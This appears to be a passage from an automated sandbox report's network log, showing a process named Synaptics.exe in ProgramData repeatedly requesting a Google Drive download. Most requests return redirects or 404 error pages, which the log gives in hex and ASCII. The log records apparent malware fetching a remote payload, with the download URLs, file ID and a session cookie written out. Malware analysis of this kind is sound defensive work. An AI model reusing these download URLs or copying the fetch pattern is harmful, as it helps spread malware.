                                                                                                                                                                    2024-12-30 03:59:33 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:33 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 2d 47 7a 76 34 6d 52 6e 68 52 62 33 73 6c 74 51 42 6b 51 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="v-Gzv4mRnhRb3sltQBkQxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:33 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    88192.168.2.449880142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:33 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:33 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-b7P5mgJyLY2qGnXLszQsNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    89192.168.2.449881142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:33 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:34 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Ay4RxBpc96w1vGaisqgXZN6kJlSI3CW79YcffGF3PvAOJmsFfwtL5PIqpHjCQVifj
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YHmc-ArVDg9jrLUeHyxWNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:34 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:34 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 76 6d 35 33 43 5a 59 48 47 66 31 30 2d 75 61 36 38 78 75 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="0vm53CZYHGf10-ua68xulQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:34 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    90192.168.2.449882142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:34 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:34 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Jey-Zvd9GnpExHvgFumY2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    91192.168.2.449883142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    92192.168.2.449884142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:34 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    93192.168.2.449885142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:34 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    94192.168.2.449887142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:35 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:35 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5n2jGEQCWLlQS-h6XieblUAo3rIkMj6uEeYyi8ldX-QWx4vY9N6Mkjw5-Sx07s_GvK
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:35 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jjmdGFN99Fr0H8FCWxmiWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:35 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:35 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 34 59 77 72 41 75 47 36 75 30 33 6e 37 46 6e 31 53 43 63 65 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="i4YwrAuG6u03n7Fn1SCcew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:35 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    95192.168.2.449888142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:35 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-i-OYNHEsv-x8sZLWLaMSaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    96192.168.2.449889142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:35 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:35 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3mkgeWO1zxtsaOr9qLSXww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


